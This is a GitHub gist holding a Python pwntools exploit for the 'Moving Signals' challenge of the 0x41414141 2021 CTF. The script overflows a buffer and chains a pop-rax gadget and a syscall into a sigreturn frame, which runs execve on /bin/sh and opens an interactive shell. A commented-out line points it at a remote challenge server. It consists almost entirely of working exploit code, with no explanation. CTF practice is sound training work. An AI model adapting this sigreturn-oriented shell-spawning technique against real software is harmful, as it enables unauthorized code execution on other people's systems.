Skip to content

Instantly share code, notes, and snippets.

@lionaneesh
Last active March 15, 2021 11:07
Show Gist options
  • Save lionaneesh/d3298cc8f69b31af791c01a0e6b378b5 to your computer and use it in GitHub Desktop.
Save lionaneesh/d3298cc8f69b31af791c01a0e6b378b5 to your computer and use it in GitHub Desktop.
Exploit for Moving Signals from 0x41414141 2021 ctf
from pwn import *
binary = ELF("./moving-signals")
pr = process("./moving-signals")
#pr = remote("161.97.176.150", 2525)
buff = 0x7ffd4ac736b0
pop_rax_ret = 0x0000000000041018
binshstr = 0x41250
syscall_ret = 0x41015
frame = SigreturnFrame(arch="amd64", kernel="amd64")
frame.rax = 59
frame.rdi = binshstr
frame.rsi = 0
frame.rdx = 0
frame.rsp = 0xdeadbeef
frame.rip = syscall_ret
offset = 8
length = 500
p = b"A" * offset + p64(pop_rax_ret)
p += p64(0xf)
p += p64(syscall_ret)
p += bytes(frame)
raw_input("Waiting!")
pr.sendline(p)
pr.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment